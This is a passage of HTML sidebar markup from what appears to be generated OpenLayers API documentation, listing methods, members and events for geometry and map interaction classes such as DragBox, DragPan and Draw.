<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.SimpleGeometry">
<span class="title">
<a href="ol.geom.SimpleGeometry.html">ol.geom.SimpleGeometry</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.SimpleGeometry#applyTransform" class="">
<a href="ol.geom.SimpleGeometry.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.SimpleGeometry#changed" class="unstable">
<a href="ol.geom.SimpleGeometry.html#changed">changed</a>
</li>
<li data-name="ol.geom.SimpleGeometry#get" class="">
<a href="ol.geom.SimpleGeometry.html#get">get</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getClosestPoint" class="">
<a href="ol.geom.SimpleGeometry.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getExtent" class="">
<a href="ol.geom.SimpleGeometry.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getFirstCoordinate" class="">
<a href="ol.geom.SimpleGeometry.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getKeys" class="">
<a href="ol.geom.SimpleGeometry.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getLastCoordinate" class="">
<a href="ol.geom.SimpleGeometry.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getLayout" class="">
<a href="ol.geom.SimpleGeometry.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getProperties" class="">
<a href="ol.geom.SimpleGeometry.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.SimpleGeometry#getRevision" class="unstable">
<a href="ol.geom.SimpleGeometry.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.SimpleGeometry#on" class="">
<a href="ol.geom.SimpleGeometry.html#on">on</a>
</li>
<li data-name="ol.geom.SimpleGeometry#once" class="">
<a href="ol.geom.SimpleGeometry.html#once">once</a>
</li>
<li data-name="ol.geom.SimpleGeometry#set" class="">
<a href="ol.geom.SimpleGeometry.html#set">set</a>
</li>
<li data-name="ol.geom.SimpleGeometry#setProperties" class="">
<a href="ol.geom.SimpleGeometry.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.SimpleGeometry#transform" class="">
<a href="ol.geom.SimpleGeometry.html#transform">transform</a>
</li>
<li data-name="ol.geom.SimpleGeometry#translate" class="">
<a href="ol.geom.SimpleGeometry.html#translate">translate</a>
</li>
<li data-name="ol.geom.SimpleGeometry#un" class="">
<a href="ol.geom.SimpleGeometry.html#un">un</a>
</li>
<li data-name="ol.geom.SimpleGeometry#unByKey" class="">
<a href="ol.geom.SimpleGeometry.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.SimpleGeometry#unset" class="">
<a href="ol.geom.SimpleGeometry.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.has">
<span class="title">
<a href="ol.has.html">ol.has</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.has.CANVAS"><a href="ol.has.html#CANVAS">CANVAS</a></li>
<li data-name="ol.has.DEVICE_ORIENTATION"><a href="ol.has.html#DEVICE_ORIENTATION">DEVICE_ORIENTATION</a></li>
<li data-name="ol.has.DEVICE_PIXEL_RATIO"><a href="ol.has.html#DEVICE_PIXEL_RATIO">DEVICE_PIXEL_RATIO</a></li>
<li data-name="ol.has.GEOLOCATION"><a href="ol.has.html#GEOLOCATION">GEOLOCATION</a></li>
<li data-name="ol.has.TOUCH"><a href="ol.has.html#TOUCH">TOUCH</a></li>
<li data-name="ol.has.WEBGL"><a href="ol.has.html#WEBGL">WEBGL</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.interaction">
<span class="title">
<a href="ol.interaction.html">ol.interaction</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.interaction.DrawGeometryFunctionType" class="unstable">
<a href="ol.interaction.html#DrawGeometryFunctionType">DrawGeometryFunctionType</a>
</li>
<li data-name="ol.interaction.SelectFilterFunction" class="unstable">
<a href="ol.interaction.html#SelectFilterFunction">SelectFilterFunction</a>
</li>
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.defaults" class="">
<a href="ol.interaction.html#defaults">defaults</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.interaction.DoubleClickZoom">
<span class="title">
<a href="ol.interaction.DoubleClickZoom.html">ol.interaction.DoubleClickZoom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.DoubleClickZoom.handleEvent" class="unstable">
<a href="ol.interaction.DoubleClickZoom.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#changed" class="unstable">
<a href="ol.interaction.DoubleClickZoom.html#changed">changed</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#get" class="">
<a href="ol.interaction.DoubleClickZoom.html#get">get</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#getActive" class="unstable">
<a href="ol.interaction.DoubleClickZoom.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#getKeys" class="">
<a href="ol.interaction.DoubleClickZoom.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#getProperties" class="">
<a href="ol.interaction.DoubleClickZoom.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#getRevision" class="unstable">
<a href="ol.interaction.DoubleClickZoom.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#on" class="">
<a href="ol.interaction.DoubleClickZoom.html#on">on</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#once" class="">
<a href="ol.interaction.DoubleClickZoom.html#once">once</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#set" class="">
<a href="ol.interaction.DoubleClickZoom.html#set">set</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#setActive" class="unstable">
<a href="ol.interaction.DoubleClickZoom.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#setProperties" class="">
<a href="ol.interaction.DoubleClickZoom.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#un" class="">
<a href="ol.interaction.DoubleClickZoom.html#un">un</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#unByKey" class="">
<a href="ol.interaction.DoubleClickZoom.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.DoubleClickZoom#unset" class="">
<a href="ol.interaction.DoubleClickZoom.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.DragAndDrop">
<span class="title">
<a href="ol.interaction.DragAndDrop.html">ol.interaction.DragAndDrop</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.interaction.DragAndDrop.handleEvent"><a href="ol.interaction.DragAndDrop.html#handleEvent">handleEvent</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.DragAndDrop#changed" class="unstable">
<a href="ol.interaction.DragAndDrop.html#changed">changed</a>
</li>
<li data-name="ol.interaction.DragAndDrop#get" class="">
<a href="ol.interaction.DragAndDrop.html#get">get</a>
</li>
<li data-name="ol.interaction.DragAndDrop#getActive" class="unstable">
<a href="ol.interaction.DragAndDrop.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.DragAndDrop#getKeys" class="">
<a href="ol.interaction.DragAndDrop.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.DragAndDrop#getProperties" class="">
<a href="ol.interaction.DragAndDrop.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.DragAndDrop#getRevision" class="unstable">
<a href="ol.interaction.DragAndDrop.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.DragAndDrop#on" class="">
<a href="ol.interaction.DragAndDrop.html#on">on</a>
</li>
<li data-name="ol.interaction.DragAndDrop#once" class="">
<a href="ol.interaction.DragAndDrop.html#once">once</a>
</li>
<li data-name="ol.interaction.DragAndDrop#set" class="">
<a href="ol.interaction.DragAndDrop.html#set">set</a>
</li>
<li data-name="ol.interaction.DragAndDrop#setActive" class="unstable">
<a href="ol.interaction.DragAndDrop.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.DragAndDrop#setProperties" class="">
<a href="ol.interaction.DragAndDrop.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.DragAndDrop#un" class="">
<a href="ol.interaction.DragAndDrop.html#un">un</a>
</li>
<li data-name="ol.interaction.DragAndDrop#unByKey" class="">
<a href="ol.interaction.DragAndDrop.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.DragAndDrop#unset" class="">
<a href="ol.interaction.DragAndDrop.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.interaction.DragAndDropEvent#event:addfeatures" class="">
<a href="ol.interaction.DragAndDropEvent.html#event:addfeatures">addfeatures</a>
</li>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.DragAndDropEvent">
<span class="title">
<a href="ol.interaction.DragAndDropEvent.html">ol.interaction.DragAndDropEvent</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.interaction.DragAndDropEvent#features"><a href="ol.interaction.DragAndDropEvent.html#features">features</a></li>
<li data-name="ol.interaction.DragAndDropEvent#file"><a href="ol.interaction.DragAndDropEvent.html#file">file</a></li>
<li data-name="ol.interaction.DragAndDropEvent#projection"><a href="ol.interaction.DragAndDropEvent.html#projection">projection</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.interaction.DragBox">
<span class="title">
<a href="ol.interaction.DragBox.html">ol.interaction.DragBox</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.DragBox#changed" class="unstable">
<a href="ol.interaction.DragBox.html#changed">changed</a>
</li>
<li data-name="ol.interaction.DragBox#get" class="">
<a href="ol.interaction.DragBox.html#get">get</a>
</li>
<li data-name="ol.interaction.DragBox#getActive" class="unstable">
<a href="ol.interaction.DragBox.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.DragBox#getGeometry" class="">
<a href="ol.interaction.DragBox.html#getGeometry">getGeometry</a>
</li>
<li data-name="ol.interaction.DragBox#getKeys" class="">
<a href="ol.interaction.DragBox.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.DragBox#getProperties" class="">
<a href="ol.interaction.DragBox.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.DragBox#getRevision" class="unstable">
<a href="ol.interaction.DragBox.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.DragBox#on" class="">
<a href="ol.interaction.DragBox.html#on">on</a>
</li>
<li data-name="ol.interaction.DragBox#once" class="">
<a href="ol.interaction.DragBox.html#once">once</a>
</li>
<li data-name="ol.interaction.DragBox#set" class="">
<a href="ol.interaction.DragBox.html#set">set</a>
</li>
<li data-name="ol.interaction.DragBox#setActive" class="unstable">
<a href="ol.interaction.DragBox.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.DragBox#setProperties" class="">
<a href="ol.interaction.DragBox.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.DragBox#un" class="">
<a href="ol.interaction.DragBox.html#un">un</a>
</li>
<li data-name="ol.interaction.DragBox#unByKey" class="">
<a href="ol.interaction.DragBox.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.DragBox#unset" class="">
<a href="ol.interaction.DragBox.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.DragBoxEvent#event:boxend" class="">
<a href="ol.DragBoxEvent.html#event:boxend">boxend</a>
</li>
<li data-name="ol.DragBoxEvent#event:boxstart" class="">
<a href="ol.DragBoxEvent.html#event:boxstart">boxstart</a>
</li>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.DragPan">
<span class="title">
<a href="ol.interaction.DragPan.html">ol.interaction.DragPan</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.DragPan#changed" class="unstable">
<a href="ol.interaction.DragPan.html#changed">changed</a>
</li>
<li data-name="ol.interaction.DragPan#get" class="">
<a href="ol.interaction.DragPan.html#get">get</a>
</li>
<li data-name="ol.interaction.DragPan#getActive" class="unstable">
<a href="ol.interaction.DragPan.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.DragPan#getKeys" class="">
<a href="ol.interaction.DragPan.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.DragPan#getProperties" class="">
<a href="ol.interaction.DragPan.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.DragPan#getRevision" class="unstable">
<a href="ol.interaction.DragPan.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.DragPan#on" class="">
<a href="ol.interaction.DragPan.html#on">on</a>
</li>
<li data-name="ol.interaction.DragPan#once" class="">
<a href="ol.interaction.DragPan.html#once">once</a>
</li>
<li data-name="ol.interaction.DragPan#set" class="">
<a href="ol.interaction.DragPan.html#set">set</a>
</li>
<li data-name="ol.interaction.DragPan#setActive" class="unstable">
<a href="ol.interaction.DragPan.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.DragPan#setProperties" class="">
<a href="ol.interaction.DragPan.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.DragPan#un" class="">
<a href="ol.interaction.DragPan.html#un">un</a>
</li>
<li data-name="ol.interaction.DragPan#unByKey" class="">
<a href="ol.interaction.DragPan.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.DragPan#unset" class="">
<a href="ol.interaction.DragPan.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.DragRotate">
<span class="title">
<a href="ol.interaction.DragRotate.html">ol.interaction.DragRotate</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.DragRotate#changed" class="unstable">
<a href="ol.interaction.DragRotate.html#changed">changed</a>
</li>
<li data-name="ol.interaction.DragRotate#get" class="">
<a href="ol.interaction.DragRotate.html#get">get</a>
</li>
<li data-name="ol.interaction.DragRotate#getActive" class="unstable">
<a href="ol.interaction.DragRotate.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.DragRotate#getKeys" class="">
<a href="ol.interaction.DragRotate.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.DragRotate#getProperties" class="">
<a href="ol.interaction.DragRotate.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.DragRotate#getRevision" class="unstable">
<a href="ol.interaction.DragRotate.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.DragRotate#on" class="">
<a href="ol.interaction.DragRotate.html#on">on</a>
</li>
<li data-name="ol.interaction.DragRotate#once" class="">
<a href="ol.interaction.DragRotate.html#once">once</a>
</li>
<li data-name="ol.interaction.DragRotate#set" class="">
<a href="ol.interaction.DragRotate.html#set">set</a>
</li>
<li data-name="ol.interaction.DragRotate#setActive" class="unstable">
<a href="ol.interaction.DragRotate.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.DragRotate#setProperties" class="">
<a href="ol.interaction.DragRotate.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.DragRotate#un" class="">
<a href="ol.interaction.DragRotate.html#un">un</a>
</li>
<li data-name="ol.interaction.DragRotate#unByKey" class="">
<a href="ol.interaction.DragRotate.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.DragRotate#unset" class="">
<a href="ol.interaction.DragRotate.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.DragRotateAndZoom">
<span class="title">
<a href="ol.interaction.DragRotateAndZoom.html">ol.interaction.DragRotateAndZoom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.DragRotateAndZoom#changed" class="unstable">
<a href="ol.interaction.DragRotateAndZoom.html#changed">changed</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#get" class="">
<a href="ol.interaction.DragRotateAndZoom.html#get">get</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#getActive" class="unstable">
<a href="ol.interaction.DragRotateAndZoom.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#getKeys" class="">
<a href="ol.interaction.DragRotateAndZoom.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#getProperties" class="">
<a href="ol.interaction.DragRotateAndZoom.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#getRevision" class="unstable">
<a href="ol.interaction.DragRotateAndZoom.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#on" class="">
<a href="ol.interaction.DragRotateAndZoom.html#on">on</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#once" class="">
<a href="ol.interaction.DragRotateAndZoom.html#once">once</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#set" class="">
<a href="ol.interaction.DragRotateAndZoom.html#set">set</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#setActive" class="unstable">
<a href="ol.interaction.DragRotateAndZoom.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#setProperties" class="">
<a href="ol.interaction.DragRotateAndZoom.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#un" class="">
<a href="ol.interaction.DragRotateAndZoom.html#un">un</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#unByKey" class="">
<a href="ol.interaction.DragRotateAndZoom.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.DragRotateAndZoom#unset" class="">
<a href="ol.interaction.DragRotateAndZoom.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.DragZoom">
<span class="title">
<a href="ol.interaction.DragZoom.html">ol.interaction.DragZoom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.DragZoom#changed" class="unstable">
<a href="ol.interaction.DragZoom.html#changed">changed</a>
</li>
<li data-name="ol.interaction.DragZoom#get" class="">
<a href="ol.interaction.DragZoom.html#get">get</a>
</li>
<li data-name="ol.interaction.DragZoom#getActive" class="unstable">
<a href="ol.interaction.DragZoom.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.DragZoom#getGeometry" class="">
<a href="ol.interaction.DragZoom.html#getGeometry">getGeometry</a>
</li>
<li data-name="ol.interaction.DragZoom#getKeys" class="">
<a href="ol.interaction.DragZoom.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.DragZoom#getProperties" class="">
<a href="ol.interaction.DragZoom.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.DragZoom#getRevision" class="unstable">
<a href="ol.interaction.DragZoom.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.DragZoom#on" class="">
<a href="ol.interaction.DragZoom.html#on">on</a>
</li>
<li data-name="ol.interaction.DragZoom#once" class="">
<a href="ol.interaction.DragZoom.html#once">once</a>
</li>
<li data-name="ol.interaction.DragZoom#set" class="">
<a href="ol.interaction.DragZoom.html#set">set</a>
</li>
<li data-name="ol.interaction.DragZoom#setActive" class="unstable">
<a href="ol.interaction.DragZoom.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.DragZoom#setProperties" class="">
<a href="ol.interaction.DragZoom.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.DragZoom#un" class="">
<a href="ol.interaction.DragZoom.html#un">un</a>
</li>
<li data-name="ol.interaction.DragZoom#unByKey" class="">
<a href="ol.interaction.DragZoom.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.DragZoom#unset" class="">
<a href="ol.interaction.DragZoom.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.DragBoxEvent#event:boxend" class="">
<a href="ol.DragBoxEvent.html#event:boxend">boxend</a>
</li>
<li data-name="ol.DragBoxEvent#event:boxstart" class="">
<a href="ol.DragBoxEvent.html#event:boxstart">boxstart</a>
</li>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.Draw">
<span class="title">
<a href="ol.interaction.Draw.html">ol.interaction.Draw</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.Draw.createRegularPolygon" class="unstable">
<a href="ol.interaction.Draw.html#createRegularPolygon">createRegularPolygon</a>
</li>
<li data-name="ol.interaction.Draw.handleEvent" class="unstable">
<a href="ol.interaction.Draw.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.Draw#changed" class="unstable">
<a href="ol.interaction.Draw.html#changed">changed</a>
</li>
<li data-name="ol.interaction.Draw#finishDrawing" class="unstable">
<a href="ol.interaction.Draw.html#finishDrawing">finishDrawing</a>
</li>
<li data-name="ol.interaction.Draw#get" class="">
<a href="ol.interaction.Draw.html#get">get</a>
</li>
<li data-name="ol.interaction.Draw#getActive" class="unstable">
<a href="ol.interaction.Draw.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.Draw#getKeys" class="">
<a href="ol.interaction.Draw.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.Draw#getProperties" class="">
<a href="ol.interaction.Draw.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.Draw#getRevision" class="unstable">
<a href="ol.interaction.Draw.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.Draw#on" class="">
<a href="ol.interaction.Draw.html#on">on</a>
</li>
<li data-name="ol.interaction.Draw#once" class="">
<a href="ol.interaction.Draw.html#once">once</a>
</li>
<li data-name="ol.interaction.Draw#set" class="">
<a href="ol.interaction.Draw.html#set">set</a>
</li>
<li data-name="ol.interaction.Draw#setActive" class="unstable">
<a href="ol.interaction.Draw.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.Draw#setProperties" class="">
<a href="ol.interaction.Draw.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.Draw#un" class="">
<a href="ol.interaction.Draw.html#un">un</a>
</li>
<li data-name="ol.interaction.Draw#unByKey" class="">
<a href="ol.interaction.Draw.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.Draw#unset" class="">
<a href="ol.interaction.Draw.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.interaction.DrawEvent#event:drawend" class="">
<a href="ol.interaction.DrawEvent.html#event:drawend">drawend</a>
</li>
<li data-name="ol.interaction.DrawEvent#event:drawstart" class="">
<a href="ol.interaction.DrawEvent.html#event:drawstart">drawstart</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.DrawEvent">
<span class="title">
<a href="ol.interaction.DrawEvent.html">ol.interaction.DrawEvent</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.interaction.DrawEvent#feature"><a href="ol.interaction.DrawEvent.html#feature">feature</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.interaction.Interaction">
<span class="title">
<a href="ol.interaction.Interaction.html">ol.interaction.Interaction</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.Interaction#changed" class="unstable">
<a href="ol.interaction.Interaction.html#changed">changed</a>
</li>
<li data-name="ol.interaction.Interaction#get" class="">
<a href="ol.interaction.Interaction.html#get">get</a>
</li>
<li data-name="ol.interaction.Interaction#getActive" class="unstable">
<a href="ol.interaction.Interaction.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.Interaction#getKeys" class="">
<a href="ol.interaction.Interaction.html#getKeys">getKeys</a>
</li>
<li data-name="ol.interaction.Interaction#getProperties" class="">
<a href="ol.interaction.Interaction.html#getProperties">getProperties</a>
</li>
<li data-name="ol.interaction.Interaction#getRevision" class="unstable">
<a href="ol.interaction.Interaction.html#getRevision">getRevision</a>
</li>
<li data-name="ol.interaction.Interaction#on" class="">
<a href="ol.interaction.Interaction.html#on">on</a>
</li>
<li data-name="ol.interaction.Interaction#once" class="">
<a href="ol.interaction.Interaction.html#once">once</a>
</li>
<li data-name="ol.interaction.Interaction#set" class="">
<a href="ol.interaction.Interaction.html#set">set</a>
</li>
<li data-name="ol.interaction.Interaction#setActive" class="unstable">
<a href="ol.interaction.Interaction.html#setActive">setActive</a>
</li>
<li data-name="ol.interaction.Interaction#setProperties" class="">
<a href="ol.interaction.Interaction.html#setProperties">setProperties</a>
</li>
<li data-name="ol.interaction.Interaction#un" class="">
<a href="ol.interaction.Interaction.html#un">un</a>
</li>
<li data-name="ol.interaction.Interaction#unByKey" class="">
<a href="ol.interaction.Interaction.html#unByKey">unByKey</a>
</li>
<li data-name="ol.interaction.Interaction#unset" class="">
<a href="ol.interaction.Interaction.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:active" class="unstable">
change:active
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.interaction.KeyboardPan">
<span class="title">
<a href="ol.interaction.KeyboardPan.html">ol.interaction.KeyboardPan</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.interaction.KeyboardPan.handleEvent" class="unstable">
<a href="ol.interaction.KeyboardPan.html#handleEvent">handleEvent</a>
</li>
<li data-name="ol.interaction.KeyboardPan#changed" class="unstable">
<a href="ol.interaction.KeyboardPan.html#changed">changed</a>
</li>
<li data-name="ol.interaction.KeyboardPan#get" class="">
<a href="ol.interaction.KeyboardPan.html#get">get</a>
</li>
<li data-name="ol.interaction.KeyboardPan#getActive" class="unstable">
<a href="ol.interaction.KeyboardPan.html#getActive">getActive</a>
</li>
<li data-name="ol.interaction.KeyboardPan#getKeys" class="">
<a href="ol.interaction.KeyboardPan.html#getKeys">getKeys</a>
</li>
